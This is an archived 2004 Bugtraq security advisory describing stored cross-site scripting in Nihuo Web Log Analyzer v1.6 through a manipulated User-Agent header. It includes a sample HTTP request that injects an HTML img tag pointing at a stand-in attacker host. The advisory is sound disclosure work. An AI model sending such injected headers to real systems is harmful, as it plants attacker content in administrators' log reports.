lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040820192529.10833.qmail@www.securityfocus.com>
Date: 20 Aug 2004 19:25:29 -0000
From: Audun Larsen <larsen@...s.com>
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer




---------------------------------------------------------------------------
          Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer
---------------------------------------------------------------------------
Author:		Audun Larsen (larsen at xqus dot com)
Date:		Aug 20, 2004


Affected software:
==================
Name:		Nihuo Web Log Analyzer
URL:		http://www.loganalyzer.net/index.html
Version:	v1.6 (older versions not tested)
Released:	Feb 17, 2004


Vendors description:
====================
Nihuo Web Log Analyzer can generate a wide range of reports and statistics from your log file - more than 80 different reports with 2D and 3D graphs.


Introduction:
=============
Most developers know that input validation is important. If you look at the history of PHP-nuke you can see that software that does not check the user
input thoroughly, is insecure.


Discussion:
===========
Many think that http access-log analyzers don't get any input from the user.
But think about it, both the user-agent and the referer header is data that can be manipulated by the user.
Nihuo Web Log Analyzer is vulnerable to just this type of attack.


Exploit:
========
To exploit Nihuo Web Log Analyzer we have to send a special HTTP request that includes malicious code.

GET / HTTP/1.1
Host: sample.com
Connection: close
Accept: text/plain
Accept-Language: en-us,en
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Some-Fake-UA <img src='http://attacker.host.com/app.gif'>

Generating this HTTP request can easily be done in Perl, PHP or any other language. Generating enough hits with this user-agent will cause the user-agent to appear in the "Top Browsers" list, with the HTML code
included. Notice that single quotes is used in the User-Agent.


Tested with:
============
Apache 1.3.x
Nihuo Web Log Analyzer v1.6 (Running on Win2k)


Solution:
=========
No solution available at the time writing.
Vendor notified Aug 20, 2004.


Disclaimer: 
===========
The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Copyright © 2004 Audun Larsen


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ